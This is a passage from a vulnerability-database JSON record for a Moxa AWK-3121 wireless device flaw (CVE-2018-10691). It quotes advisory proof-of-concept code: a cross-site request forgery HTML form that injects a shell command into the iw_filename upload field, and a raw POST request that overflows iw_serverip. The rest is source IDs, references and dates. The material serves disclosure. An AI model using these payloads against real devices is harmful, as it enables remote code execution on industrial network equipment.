execute buffer overflow\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n13. \n It provides functionality so that an administrator\n can run scripts on the device to troubleshoot any issues. The POST parameter \"iw_filename\" is susceptible to command\n injection via shell metacharacters. \n \n ------------------------------------------\n \n [Additional Information]\n POC\n \n \u003chtml\n \u003cbody\n \u003cscript\n function submitRequest()\n {\n var formData = new FormData();\n \n formData.append(\"iw_filename\", \";`ping -c 9 192.168.127.103` ##\");\n formData.append(\"iw_storage\", \"tftp\");\n formData.append(\"iw_serverip\", \"192.168.1.101\");\n formData.append(\"bkpath\", \"/wireless_cert.asp?index=1\");\n \n // HTML file input, chosen by user\n formData.append(\"certFile1\", \"test.txt\");\n \n // JavaScript file-like object\n var content = \u0027\u003ca id=\"a\"\u003cb id=\"b\"hey!\u003c/b\u003c/a\u0027; // the body of the new file... \n var blob = new Blob([content], { type: \"text/xml\"});\n \n formData.append(\"certFile\", blob);\n \n var request = new XMLHttpRequest();\n request.open(\"POST\", \"http://192.168.127.253/forms/web_certUpload\");\n request.send(formData);\n }\n \u003c/script\n \u003cform action=\"#\"\n \u003cinput type=\"submit\" value=\"Submit request\" onclick=\"submitRequest();\" /\n \u003c/form\n \u003c/body\n \u003c/html\n \n ------------------------------------------\n \n [VulnerabilityType Other]\n Command injection in web runscript functionality\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF form to trick an admin into submitting the request\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n14. \n It provides functionality so that an administrator\n can run scripts on the device to troubleshoot any issues. The POST parameter \"iw_serverip\" is susceptible to buffer\n overflow. By crafting a packet that contains a string of\n 480 characters, it is possible for an attacker to execute the attack. \n \n ------------------------------------------\n \n [Additional Information]\n POC\n POST /forms/web_runScript HTTP/1.1\n Cookie: Password508=c629f1b9d18c3d751da6d7b1fd43e628\n \n ... 7e21a62f2905ca\n Content-Disposition: form-data; name=\"iw_filename\"; filename=\"XXXX\"\n Content-Type: application/octet-stream\n \n ls -ltr\n ... 7e21a62f2905ca\n Content-Disposition: form-data; name=\"iw_storage\"\n \n tftp\n ... 7e21a62f2905ca\n Content-Disposition: form-data; name=\"iw_serverip\"\n \n AAAAAAAAAAAAAAAAAA (etc.)\n \n ... 7e21a62f2905ca\n Content-Disposition: form-data; name=\"bkpath\"\n \n /Troubleshooting.asp\n ... 7e21a62f2905ca--\n \n ------------------------------------------\n \n [Vulnerability Type]\n Buffer Overflow\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF form to trick an admin into submitting the request and execute the buffer overflow\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-10691"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015586"
},
{
"db": "CNVD",
"id": "CNVD-2019-23549"
},
{
"db": "VULHUB",
"id": "VHN-120476"
},
{
"db": "VULMON",
"id": "CVE-2018-10691"
},
{
"db": "PACKETSTORM",
"id": "153223"
}
],
"trust": 2.43
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-10691",
"trust": 3.3
},
{
"db": "PACKETSTORM",
"id": "153223",
"trust": 1.9
},
{
"db": "ICS CERT",
"id": "ICSA-19-337-02",
"trust": 1.4
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015586",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201906-319",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2019-23549",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2019.4544",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-120476",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2018-10691",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-23549"
},
{
"db": "VULHUB",
"id": "VHN-120476"
},
{
"db": "VULMON",
"id": "CVE-2018-10691"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015586"
},
{
"db": "PACKETSTORM",
"id": "153223"
},
{
"db": "NVD",
"id": "CVE-2018-10691"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-319"
}
]
},
"id": "VAR-201906-0781",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-23549"
},
{
"db": "VULHUB",
"id": "VHN-120476"
}
],
"trust": 0.06999999999999999
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-23549"
}
]
},
"last_update_date": "2023-12-18T12:00:03.917000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "AWK-3121 Series",
"trust": 0.8,
"url": "https://www.moxa.com/en/products/phased-out-products/awk-3121-series"
},
{
"title": "Moxa_AWK_1121",
"trust": 0.1,
"url": "https://github.com/samuelhuntley/moxa_awk_1121 "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2018-10691"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015586"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-284",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-120476"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015586"
},
{
"db": "NVD",
"id": "CVE-2018-10691"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.6,
"url": "https://github.com/samuelhuntley/moxa_awk_1121/blob/master/moxa_awk_1121"
},
{
"trust": 2.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10691"
},
{
"trust": 1.8,
"url": "https://seclists.org/bugtraq/2019/jun/8"
},
{
"trust": 1.8,
"url": "http://packetstormsecurity.com/files/153223/moxa-awk-3121-1.14-information-disclosure-command-execution.html"
},
{
"trust": 1.4,
"url": "https://www.us-cert.gov/ics/advisories/icsa-19-337-02"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-10691"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2019.4544/"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/284.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://github.com/samuelhuntley/moxa_awk_1121"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10702"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10699"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10701"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10693"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10698"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10695"
},
{
"trust": 0.1,
"url": "http://192.168.127.253/forms/websetmainrestart\""
},
{
"trust": 0.1,
"url": "https://www.moxa.com/event/tech/2008/awk-3121/index.htm"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10696"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10703"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10690"
},
{
"trust": 0.1,
"url": "http://192.168.127.253/forms/iw_websetparameters\""
},
{
"trust": 0.1,
"url": "http://192.168.127.253/forms/web_certupload\");"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10694"
},
{
"trust": 0.1,
"url": "http://192.168.127.253//systemlog.log"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10697"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10700"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10692"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-23549"
},
{
"db": "VULHUB",
"id": "VHN-120476"
},
{
"db": "VULMON",
"id": "CVE-2018-10691"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015586"
},
{
"db": "PACKETSTORM",
"id": "153223"
},
{
"db": "NVD",
"id": "CVE-2018-10691"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-319"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2019-23549"
},
{
"db": "VULHUB",
"id": "VHN-120476"
},
{
"db": "VULMON",
"id": "CVE-2018-10691"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015586"
},
{
"db": "PACKETSTORM",
"id": "153223"
},
{
"db": "NVD",
"id": "CVE-2018-10691"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-319"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-07-22T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-23549"
},
{
"date": "2019-06-07T00:00:00",
"db": "VULHUB",
"id": "VHN-120476"
},
{
"date": "2019-06-07T00:00:00",
"db": "VULMON",
"id": "CVE-2018-10691"
},
{
"date": "2019-06-19T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-015586"
},
{
"date": "2019-06-07T22:22:22",
"db": "PACKETSTORM",
"id": "153223"
},
{
"date": "2019-06-07T20:29:00.293000",
"db": "NVD",
"id": "CVE-2018-10691"
},
{
"date": "2019-06-07T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201906-319"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-07-22T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-23549"
},
{
"date": "2019-06-10T00:00:00",
"db": "VULHUB",
"id": "VHN-120476"
},
{
"date": "2019-06-10T00:00:00",
"db": "VULMON",
"id": "CVE-2018-10691"
},
{
"date": "2019-12-04T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-015586"
},
{
"date": "2019-06-10T23:29:01.717000",
"db": "NVD",
"id": "CVE-2018-10691"
},
{
"date": "2019-12-04T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201906-319"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201906-319"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Moxa AWK-3121 Access Control Error Vulnerability",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-23549"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-319"
}
],
"trust": 1.2
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "access control error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201906-319"
}
],
"trust": 0.6
}
}